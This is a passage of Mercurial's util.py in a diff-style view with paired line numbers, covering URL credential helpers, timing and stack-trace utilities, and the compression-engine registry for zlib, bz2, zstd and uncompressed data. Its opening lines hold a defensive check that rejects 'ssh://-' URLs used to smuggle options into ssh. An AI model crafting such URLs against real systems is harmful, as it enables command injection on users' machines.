2958 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2962 raise error.Abort(_('potentially unsafe url: %r') %
2959 raise error.Abort(_('potentially unsafe url: %r') %
2963 (path,))
2960 (path,))
2964
2961
2965 def hidepassword(u):
2962 def hidepassword(u):
2966 '''hide user credential in a url string'''
2963 '''hide user credential in a url string'''
2967 u = url(u)
2964 u = url(u)
2968 if u.passwd:
2965 if u.passwd:
2969 u.passwd = '***'
2966 u.passwd = '***'
2970 return bytes(u)
2967 return bytes(u)
2971
2968
2972 def removeauth(u):
2969 def removeauth(u):
2973 '''remove all authentication information from a url string'''
2970 '''remove all authentication information from a url string'''
2974 u = url(u)
2971 u = url(u)
2975 u.user = u.passwd = None
2972 u.user = u.passwd = None
2976 return str(u)
2973 return str(u)
2977
2974
2978 timecount = unitcountfn(
2975 timecount = unitcountfn(
2979 (1, 1e3, _('%.0f s')),
2976 (1, 1e3, _('%.0f s')),
2980 (100, 1, _('%.1f s')),
2977 (100, 1, _('%.1f s')),
2981 (10, 1, _('%.2f s')),
2978 (10, 1, _('%.2f s')),
2982 (1, 1, _('%.3f s')),
2979 (1, 1, _('%.3f s')),
2983 (100, 0.001, _('%.1f ms')),
2980 (100, 0.001, _('%.1f ms')),
2984 (10, 0.001, _('%.2f ms')),
2981 (10, 0.001, _('%.2f ms')),
2985 (1, 0.001, _('%.3f ms')),
2982 (1, 0.001, _('%.3f ms')),
2986 (100, 0.000001, _('%.1f us')),
2983 (100, 0.000001, _('%.1f us')),
2987 (10, 0.000001, _('%.2f us')),
2984 (10, 0.000001, _('%.2f us')),
2988 (1, 0.000001, _('%.3f us')),
2985 (1, 0.000001, _('%.3f us')),
2989 (100, 0.000000001, _('%.1f ns')),
2986 (100, 0.000000001, _('%.1f ns')),
2990 (10, 0.000000001, _('%.2f ns')),
2987 (10, 0.000000001, _('%.2f ns')),
2991 (1, 0.000000001, _('%.3f ns')),
2988 (1, 0.000000001, _('%.3f ns')),
2992 )
2989 )
2993
2990
2994 _timenesting = [0]
2991 _timenesting = [0]
2995
2992
2996 def timed(func):
2993 def timed(func):
2997 '''Report the execution time of a function call to stderr.
2994 '''Report the execution time of a function call to stderr.
2998
2995
2999 During development, use as a decorator when you need to measure
2996 During development, use as a decorator when you need to measure
3000 the cost of a function, e.g. as follows:
2997 the cost of a function, e.g. as follows:
3001
2998
3002 @util.timed
2999 @util.timed
3003 def foo(a, b, c):
3000 def foo(a, b, c):
3004 pass
3001 pass
3005 '''
3002 '''
3006
3003
3007 def wrapper(*args, **kwargs):
3004 def wrapper(*args, **kwargs):
3008 start = timer()
3005 start = timer()
3009 indent = 2
3006 indent = 2
3010 _timenesting[0] += indent
3007 _timenesting[0] += indent
3011 try:
3008 try:
3012 return func(*args, **kwargs)
3009 return func(*args, **kwargs)
3013 finally:
3010 finally:
3014 elapsed = timer() - start
3011 elapsed = timer() - start
3015 _timenesting[0] -= indent
3012 _timenesting[0] -= indent
3016 stderr.write('%s%s: %s\n' %
3013 stderr.write('%s%s: %s\n' %
3017 (' ' * _timenesting[0], func.__name__,
3014 (' ' * _timenesting[0], func.__name__,
3018 timecount(elapsed)))
3015 timecount(elapsed)))
3019 return wrapper
3016 return wrapper
3020
3017
3021 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3018 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3022 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3019 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3023
3020
3024 def sizetoint(s):
3021 def sizetoint(s):
3025 '''Convert a space specifier to a byte count.
3022 '''Convert a space specifier to a byte count.
3026
3023
3027 >>> sizetoint('30')
3024 >>> sizetoint('30')
3028 30
3025 30
3029 >>> sizetoint('2.2kb')
3026 >>> sizetoint('2.2kb')
3030 2252
3027 2252
3031 >>> sizetoint('6M')
3028 >>> sizetoint('6M')
3032 6291456
3029 6291456
3033 '''
3030 '''
3034 t = s.strip().lower()
3031 t = s.strip().lower()
3035 try:
3032 try:
3036 for k, u in _sizeunits:
3033 for k, u in _sizeunits:
3037 if t.endswith(k):
3034 if t.endswith(k):
3038 return int(float(t[:-len(k)]) * u)
3035 return int(float(t[:-len(k)]) * u)
3039 return int(t)
3036 return int(t)
3040 except ValueError:
3037 except ValueError:
3041 raise error.ParseError(_("couldn't parse size: %s") % s)
3038 raise error.ParseError(_("couldn't parse size: %s") % s)
3042
3039
3043 class hooks(object):
3040 class hooks(object):
3044 '''A collection of hook functions that can be used to extend a
3041 '''A collection of hook functions that can be used to extend a
3045 function's behavior. Hooks are called in lexicographic order,
3042 function's behavior. Hooks are called in lexicographic order,
3046 based on the names of their sources.'''
3043 based on the names of their sources.'''
3047
3044
3048 def __init__(self):
3045 def __init__(self):
3049 self._hooks = []
3046 self._hooks = []
3050
3047
3051 def add(self, source, hook):
3048 def add(self, source, hook):
3052 self._hooks.append((source, hook))
3049 self._hooks.append((source, hook))
3053
3050
3054 def __call__(self, *args):
3051 def __call__(self, *args):
3055 self._hooks.sort(key=lambda x: x[0])
3052 self._hooks.sort(key=lambda x: x[0])
3056 results = []
3053 results = []
3057 for source, hook in self._hooks:
3054 for source, hook in self._hooks:
3058 results.append(hook(*args))
3055 results.append(hook(*args))
3059 return results
3056 return results
3060
3057
3061 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3058 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3062 '''Yields lines for a nicely formatted stacktrace.
3059 '''Yields lines for a nicely formatted stacktrace.
3063 Skips the 'skip' last entries, then return the last 'depth' entries.
3060 Skips the 'skip' last entries, then return the last 'depth' entries.
3064 Each file+linenumber is formatted according to fileline.
3061 Each file+linenumber is formatted according to fileline.
3065 Each line is formatted according to line.
3062 Each line is formatted according to line.
3066 If line is None, it yields:
3063 If line is None, it yields:
3067 length of longest filepath+line number,
3064 length of longest filepath+line number,
3068 filepath+linenumber,
3065 filepath+linenumber,
3069 function
3066 function
3070
3067
3071 Not be used in production code but very convenient while developing.
3068 Not be used in production code but very convenient while developing.
3072 '''
3069 '''
3073 entries = [(fileline % (fn, ln), func)
3070 entries = [(fileline % (fn, ln), func)
3074 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3071 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3075 ][-depth:]
3072 ][-depth:]
3076 if entries:
3073 if entries:
3077 fnmax = max(len(entry[0]) for entry in entries)
3074 fnmax = max(len(entry[0]) for entry in entries)
3078 for fnln, func in entries:
3075 for fnln, func in entries:
3079 if line is None:
3076 if line is None:
3080 yield (fnmax, fnln, func)
3077 yield (fnmax, fnln, func)
3081 else:
3078 else:
3082 yield line % (fnmax, fnln, func)
3079 yield line % (fnmax, fnln, func)
3083
3080
3084 def debugstacktrace(msg='stacktrace', skip=0,
3081 def debugstacktrace(msg='stacktrace', skip=0,
3085 f=stderr, otherf=stdout, depth=0):
3082 f=stderr, otherf=stdout, depth=0):
3086 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3083 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3087 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3084 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3088 By default it will flush stdout first.
3085 By default it will flush stdout first.
3089 It can be used everywhere and intentionally does not require an ui object.
3086 It can be used everywhere and intentionally does not require an ui object.
3090 Not be used in production code but very convenient while developing.
3087 Not be used in production code but very convenient while developing.
3091 '''
3088 '''
3092 if otherf:
3089 if otherf:
3093 otherf.flush()
3090 otherf.flush()
3094 f.write('%s at:\n' % msg.rstrip())
3091 f.write('%s at:\n' % msg.rstrip())
3095 for line in getstackframes(skip + 1, depth=depth):
3092 for line in getstackframes(skip + 1, depth=depth):
3096 f.write(line)
3093 f.write(line)
3097 f.flush()
3094 f.flush()
3098
3095
3099 class dirs(object):
3096 class dirs(object):
3100 '''a multiset of directory names from a dirstate or manifest'''
3097 '''a multiset of directory names from a dirstate or manifest'''
3101
3098
3102 def __init__(self, map, skip=None):
3099 def __init__(self, map, skip=None):
3103 self._dirs = {}
3100 self._dirs = {}
3104 addpath = self.addpath
3101 addpath = self.addpath
3105 if safehasattr(map, 'iteritems') and skip is not None:
3102 if safehasattr(map, 'iteritems') and skip is not None:
3106 for f, s in map.iteritems():
3103 for f, s in map.iteritems():
3107 if s[0] != skip:
3104 if s[0] != skip:
3108 addpath(f)
3105 addpath(f)
3109 else:
3106 else:
3110 for f in map:
3107 for f in map:
3111 addpath(f)
3108 addpath(f)
3112
3109
3113 def addpath(self, path):
3110 def addpath(self, path):
3114 dirs = self._dirs
3111 dirs = self._dirs
3115 for base in finddirs(path):
3112 for base in finddirs(path):
3116 if base in dirs:
3113 if base in dirs:
3117 dirs[base] += 1
3114 dirs[base] += 1
3118 return
3115 return
3119 dirs[base] = 1
3116 dirs[base] = 1
3120
3117
3121 def delpath(self, path):
3118 def delpath(self, path):
3122 dirs = self._dirs
3119 dirs = self._dirs
3123 for base in finddirs(path):
3120 for base in finddirs(path):
3124 if dirs[base] > 1:
3121 if dirs[base] > 1:
3125 dirs[base] -= 1
3122 dirs[base] -= 1
3126 return
3123 return
3127 del dirs[base]
3124 del dirs[base]
3128
3125
3129 def __iter__(self):
3126 def __iter__(self):
3130 return iter(self._dirs)
3127 return iter(self._dirs)
3131
3128
3132 def __contains__(self, d):
3129 def __contains__(self, d):
3133 return d in self._dirs
3130 return d in self._dirs
3134
3131
3135 if safehasattr(parsers, 'dirs'):
3132 if safehasattr(parsers, 'dirs'):
3136 dirs = parsers.dirs
3133 dirs = parsers.dirs
3137
3134
3138 def finddirs(path):
3135 def finddirs(path):
3139 pos = path.rfind('/')
3136 pos = path.rfind('/')
3140 while pos != -1:
3137 while pos != -1:
3141 yield path[:pos]
3138 yield path[:pos]
3142 pos = path.rfind('/', 0, pos)
3139 pos = path.rfind('/', 0, pos)
3143
3140
3144 # compression code
3141 # compression code
3145
3142
3146 SERVERROLE = 'server'
3143 SERVERROLE = 'server'
3147 CLIENTROLE = 'client'
3144 CLIENTROLE = 'client'
3148
3145
3149 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3146 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3150 (u'name', u'serverpriority',
3147 (u'name', u'serverpriority',
3151 u'clientpriority'))
3148 u'clientpriority'))
3152
3149
3153 class compressormanager(object):
3150 class compressormanager(object):
3154 """Holds registrations of various compression engines.
3151 """Holds registrations of various compression engines.
3155
3152
3156 This class essentially abstracts the differences between compression
3153 This class essentially abstracts the differences between compression
3157 engines to allow new compression formats to be added easily, possibly from
3154 engines to allow new compression formats to be added easily, possibly from
3158 extensions.
3155 extensions.
3159
3156
3160 Compressors are registered against the global instance by calling its
3157 Compressors are registered against the global instance by calling its
3161 ``register()`` method.
3158 ``register()`` method.
3162 """
3159 """
3163 def __init__(self):
3160 def __init__(self):
3164 self._engines = {}
3161 self._engines = {}
3165 # Bundle spec human name to engine name.
3162 # Bundle spec human name to engine name.
3166 self._bundlenames = {}
3163 self._bundlenames = {}
3167 # Internal bundle identifier to engine name.
3164 # Internal bundle identifier to engine name.
3168 self._bundletypes = {}
3165 self._bundletypes = {}
3169 # Revlog header to engine name.
3166 # Revlog header to engine name.
3170 self._revlogheaders = {}
3167 self._revlogheaders = {}
3171 # Wire proto identifier to engine name.
3168 # Wire proto identifier to engine name.
3172 self._wiretypes = {}
3169 self._wiretypes = {}
3173
3170
3174 def __getitem__(self, key):
3171 def __getitem__(self, key):
3175 return self._engines[key]
3172 return self._engines[key]
3176
3173
3177 def __contains__(self, key):
3174 def __contains__(self, key):
3178 return key in self._engines
3175 return key in self._engines
3179
3176
3180 def __iter__(self):
3177 def __iter__(self):
3181 return iter(self._engines.keys())
3178 return iter(self._engines.keys())
3182
3179
3183 def register(self, engine):
3180 def register(self, engine):
3184 """Register a compression engine with the manager.
3181 """Register a compression engine with the manager.
3185
3182
3186 The argument must be a ``compressionengine`` instance.
3183 The argument must be a ``compressionengine`` instance.
3187 """
3184 """
3188 if not isinstance(engine, compressionengine):
3185 if not isinstance(engine, compressionengine):
3189 raise ValueError(_('argument must be a compressionengine'))
3186 raise ValueError(_('argument must be a compressionengine'))
3190
3187
3191 name = engine.name()
3188 name = engine.name()
3192
3189
3193 if name in self._engines:
3190 if name in self._engines:
3194 raise error.Abort(_('compression engine %s already registered') %
3191 raise error.Abort(_('compression engine %s already registered') %
3195 name)
3192 name)
3196
3193
3197 bundleinfo = engine.bundletype()
3194 bundleinfo = engine.bundletype()
3198 if bundleinfo:
3195 if bundleinfo:
3199 bundlename, bundletype = bundleinfo
3196 bundlename, bundletype = bundleinfo
3200
3197
3201 if bundlename in self._bundlenames:
3198 if bundlename in self._bundlenames:
3202 raise error.Abort(_('bundle name %s already registered') %
3199 raise error.Abort(_('bundle name %s already registered') %
3203 bundlename)
3200 bundlename)
3204 if bundletype in self._bundletypes:
3201 if bundletype in self._bundletypes:
3205 raise error.Abort(_('bundle type %s already registered by %s') %
3202 raise error.Abort(_('bundle type %s already registered by %s') %
3206 (bundletype, self._bundletypes[bundletype]))
3203 (bundletype, self._bundletypes[bundletype]))
3207
3204
3208 # No external facing name declared.
3205 # No external facing name declared.
3209 if bundlename:
3206 if bundlename:
3210 self._bundlenames[bundlename] = name
3207 self._bundlenames[bundlename] = name
3211
3208
3212 self._bundletypes[bundletype] = name
3209 self._bundletypes[bundletype] = name
3213
3210
3214 wiresupport = engine.wireprotosupport()
3211 wiresupport = engine.wireprotosupport()
3215 if wiresupport:
3212 if wiresupport:
3216 wiretype = wiresupport.name
3213 wiretype = wiresupport.name
3217 if wiretype in self._wiretypes:
3214 if wiretype in self._wiretypes:
3218 raise error.Abort(_('wire protocol compression %s already '
3215 raise error.Abort(_('wire protocol compression %s already '
3219 'registered by %s') %
3216 'registered by %s') %
3220 (wiretype, self._wiretypes[wiretype]))
3217 (wiretype, self._wiretypes[wiretype]))
3221
3218
3222 self._wiretypes[wiretype] = name
3219 self._wiretypes[wiretype] = name
3223
3220
3224 revlogheader = engine.revlogheader()
3221 revlogheader = engine.revlogheader()
3225 if revlogheader and revlogheader in self._revlogheaders:
3222 if revlogheader and revlogheader in self._revlogheaders:
3226 raise error.Abort(_('revlog header %s already registered by %s') %
3223 raise error.Abort(_('revlog header %s already registered by %s') %
3227 (revlogheader, self._revlogheaders[revlogheader]))
3224 (revlogheader, self._revlogheaders[revlogheader]))
3228
3225
3229 if revlogheader:
3226 if revlogheader:
3230 self._revlogheaders[revlogheader] = name
3227 self._revlogheaders[revlogheader] = name
3231
3228
3232 self._engines[name] = engine
3229 self._engines[name] = engine
3233
3230
3234 @property
3231 @property
3235 def supportedbundlenames(self):
3232 def supportedbundlenames(self):
3236 return set(self._bundlenames.keys())
3233 return set(self._bundlenames.keys())
3237
3234
3238 @property
3235 @property
3239 def supportedbundletypes(self):
3236 def supportedbundletypes(self):
3240 return set(self._bundletypes.keys())
3237 return set(self._bundletypes.keys())
3241
3238
3242 def forbundlename(self, bundlename):
3239 def forbundlename(self, bundlename):
3243 """Obtain a compression engine registered to a bundle name.
3240 """Obtain a compression engine registered to a bundle name.
3244
3241
3245 Will raise KeyError if the bundle type isn't registered.
3242 Will raise KeyError if the bundle type isn't registered.
3246
3243
3247 Will abort if the engine is known but not available.
3244 Will abort if the engine is known but not available.
3248 """
3245 """
3249 engine = self._engines[self._bundlenames[bundlename]]
3246 engine = self._engines[self._bundlenames[bundlename]]
3250 if not engine.available():
3247 if not engine.available():
3251 raise error.Abort(_('compression engine %s could not be loaded') %
3248 raise error.Abort(_('compression engine %s could not be loaded') %
3252 engine.name())
3249 engine.name())
3253 return engine
3250 return engine
3254
3251
3255 def forbundletype(self, bundletype):
3252 def forbundletype(self, bundletype):
3256 """Obtain a compression engine registered to a bundle type.
3253 """Obtain a compression engine registered to a bundle type.
3257
3254
3258 Will raise KeyError if the bundle type isn't registered.
3255 Will raise KeyError if the bundle type isn't registered.
3259
3256
3260 Will abort if the engine is known but not available.
3257 Will abort if the engine is known but not available.
3261 """
3258 """
3262 engine = self._engines[self._bundletypes[bundletype]]
3259 engine = self._engines[self._bundletypes[bundletype]]
3263 if not engine.available():
3260 if not engine.available():
3264 raise error.Abort(_('compression engine %s could not be loaded') %
3261 raise error.Abort(_('compression engine %s could not be loaded') %
3265 engine.name())
3262 engine.name())
3266 return engine
3263 return engine
3267
3264
3268 def supportedwireengines(self, role, onlyavailable=True):
3265 def supportedwireengines(self, role, onlyavailable=True):
3269 """Obtain compression engines that support the wire protocol.
3266 """Obtain compression engines that support the wire protocol.
3270
3267
3271 Returns a list of engines in prioritized order, most desired first.
3268 Returns a list of engines in prioritized order, most desired first.
3272
3269
3273 If ``onlyavailable`` is set, filter out engines that can't be
3270 If ``onlyavailable`` is set, filter out engines that can't be
3274 loaded.
3271 loaded.
3275 """
3272 """
3276 assert role in (SERVERROLE, CLIENTROLE)
3273 assert role in (SERVERROLE, CLIENTROLE)
3277
3274
3278 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3275 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3279
3276
3280 engines = [self._engines[e] for e in self._wiretypes.values()]
3277 engines = [self._engines[e] for e in self._wiretypes.values()]
3281 if onlyavailable:
3278 if onlyavailable:
3282 engines = [e for e in engines if e.available()]
3279 engines = [e for e in engines if e.available()]
3283
3280
3284 def getkey(e):
3281 def getkey(e):
3285 # Sort first by priority, highest first. In case of tie, sort
3282 # Sort first by priority, highest first. In case of tie, sort
3286 # alphabetically. This is arbitrary, but ensures output is
3283 # alphabetically. This is arbitrary, but ensures output is
3287 # stable.
3284 # stable.
3288 w = e.wireprotosupport()
3285 w = e.wireprotosupport()
3289 return -1 * getattr(w, attr), w.name
3286 return -1 * getattr(w, attr), w.name
3290
3287
3291 return list(sorted(engines, key=getkey))
3288 return list(sorted(engines, key=getkey))
3292
3289
3293 def forwiretype(self, wiretype):
3290 def forwiretype(self, wiretype):
3294 engine = self._engines[self._wiretypes[wiretype]]
3291 engine = self._engines[self._wiretypes[wiretype]]
3295 if not engine.available():
3292 if not engine.available():
3296 raise error.Abort(_('compression engine %s could not be loaded') %
3293 raise error.Abort(_('compression engine %s could not be loaded') %
3297 engine.name())
3294 engine.name())
3298 return engine
3295 return engine
3299
3296
3300 def forrevlogheader(self, header):
3297 def forrevlogheader(self, header):
3301 """Obtain a compression engine registered to a revlog header.
3298 """Obtain a compression engine registered to a revlog header.
3302
3299
3303 Will raise KeyError if the revlog header value isn't registered.
3300 Will raise KeyError if the revlog header value isn't registered.
3304 """
3301 """
3305 return self._engines[self._revlogheaders[header]]
3302 return self._engines[self._revlogheaders[header]]
3306
3303
# Singleton registry used throughout this module to look up engines.
compengines = compressormanager()
3308
3305
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Return the name of this engine.

        The name is also the key under which the engine is registered
        with the engine manager.

        Subclasses must override this method.
        """
        raise NotImplementedError()

    def available(self):
        """Report whether this engine can actually be used.

        Optional engines (for example ones relying on C extensions that
        may be missing from an installation) override this. The default
        implementation says the engine is always usable.
        """
        return True

    def bundletype(self):
        """Describe the bundle identifiers for this engine.

        Returns None when the engine cannot be used for bundles.

        Otherwise returns a 2-tuple of strings: the user-facing
        "bundle spec" compression name and the internal identifier written
        into bundle payloads. Setting the first element to ``None`` hides
        the name from external usage.

        Engines supporting bundles must also implement ``compressstream``
        and ``decompressorreader``.

        The docstring of an override is surfaced in the help system to
        describe the engine to users.
        """
        return None

    def wireprotosupport(self):
        """Declare wire-protocol support for this compression format.

        Returns None when the engine cannot compress wire-protocol
        payloads. Otherwise returns a ``compenginewireprotosupport``
        carrying a string format identifier plus integer server and client
        priorities.

        Priorities order the advertisement of format support: the highest
        integer is advertised first, and non-positive values are not
        advertised at all. The values are somewhat arbitrary defaults; the
        relative order can be changed via config options.

        Engines supporting the wire protocol must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header bytes identifying this engine in revlog chunks.

        Overrides return the bytes prefixed to chunks compressed with this
        engine so decompression can be routed back to it. The default of
        ``None`` means the engine does not participate in revlog
        compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        Receives an iterator (ideally a generator) of byte chunks and
        returns an iterator (ideally a generator) of compressed byte
        chunks. ``opts`` optionally tunes compression; each engine
        interprets it differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        ``fh`` is an object whose ``read(size)`` yields compressed data.
        The return value is an object whose ``read(size)`` yields the
        uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can compress/decompress revlog entries.

        The returned object exposes ``compress(data)``, which returns
        compressed bytes or ``None`` when compression was not worthwhile
        (input too small, incompressible, ...). Compressed output must
        start with the ``revlogheader()`` marker so decompression can be
        routed here.

        It also exposes ``decompress(data)``, called only when ``data``
        begins with ``revlogheader()``; it returns the raw uncompressed
        data or raises a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()
3425
3422
class _zlibengine(compressionengine):
    """Compression engine backed by the stdlib ``zlib`` module."""

    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and size.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        level = (opts or {}).get('level', -1)
        compressor = zlib.compressobj(level)
        for raw in it:
            out = compressor.compress(raw)
            # compress() may buffer internally and emit nothing; skip the
            # empty results instead of pushing them through the generator.
            if out:
                yield out
        yield compressor.flush()

    def decompressorreader(self, fh):
        def gen():
            decomp = zlib.decompressobj()
            for piece in filechunkiter(fh):
                while piece:
                    # Cap each emitted chunk at 256k to bound memory use.
                    yield decomp.decompress(piece, 2 ** 18)
                    piece = decomp.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                # Too small for compression to ever win.
                return None

            if insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            compressor = zlib.compressobj()
            pieces = []
            offset = 0
            while offset < insize:
                end = offset + 2 ** 20
                pieces.append(compressor.compress(data[offset:end]))
                offset = end
            pieces.append(compressor.flush())

            if sum(map(len, pieces)) < insize:
                return ''.join(pieces)
            return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()
3510
3507
# Register the zlib engine with the global engine manager.
compengines.register(_zlibengine())
3512
3509
class _bz2engine(compressionengine):
    """Compression engine backed by the stdlib ``bz2`` module."""

    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        level = (opts or {}).get('level', 9)
        compressor = bz2.BZ2Compressor(level)
        for raw in it:
            out = compressor.compress(raw)
            if out:
                yield out
        yield compressor.flush()

    def decompressorreader(self, fh):
        def gen():
            decomp = bz2.BZ2Decompressor()
            for piece in filechunkiter(fh):
                yield decomp.decompress(piece)

        return chunkbuffer(gen())
3553
3550
# Register the bzip2 engine with the global engine manager.
compengines.register(_bz2engine())
3555
3552
class _truncatedbz2engine(compressionengine):
    """Decompression-only engine for bz2 streams missing the 'BZ' magic."""

    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        # First element is None: this identifier is internal-only and is
        # hidden from user-facing bundle specs.
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            decomp = bz2.BZ2Decompressor()
            decomp.decompress('BZ')
            for piece in filechunkiter(fh):
                yield decomp.decompress(piece)

        return chunkbuffer(gen())
3574
3571
# Register the header-less bz2 engine with the global engine manager.
compengines.register(_truncatedbz2engine())
3576
3573
class _noopengine(compressionengine):
    """Pass-through engine: payloads are stored and transferred as-is."""

    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        # Identity transform: hand back the caller's iterator untouched.
        return it

    def decompressorreader(self, fh):
        # Identity transform: the stream is already uncompressed.
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            # Never claims a win, so revlog chunks are stored raw.
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()
3609
3606
# Register the no-op (uncompressed) engine with the global engine manager.
compengines.register(_noopengine())
3611
3608
class _zstdengine(compressionengine):
    """Compression engine backed by the optional bundled ``zstd`` module.

    The module import is deferred and cached so installations without the
    C extension simply report the engine as unavailable.
    """
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        # Available iff the deferred import above succeeded.
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            # compress() may buffer and emit nothing for a given chunk.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            # Recommended chunk sizes exposed by the zstd bindings; used to
            # slice large inputs during streaming (de)compression below.
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                # Too small for compression to be worthwhile.
                return None

            elif insize <= 1000000:
                # One-shot compression for moderate sizes; only return the
                # result if it actually saved space.
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                # Streaming compression for large inputs to avoid holding
                # a second full copy in memory.
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                # Normalize any decompression failure into a RevlogError
                # so callers only need to handle one exception type.
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        str(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))
3738
3735
# Register the zstd engine with the global engine manager.
compengines.register(_zstdengine())
3740
3737
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]
        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            # Engine has no bundle support, or its name is internal-only.
            continue

        docstring = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        entry = docobject()
        entry.__doc__ = docstring
        entry._origdoc = engine.bundletype.__doc__
        entry._origfunc = engine.bundletype

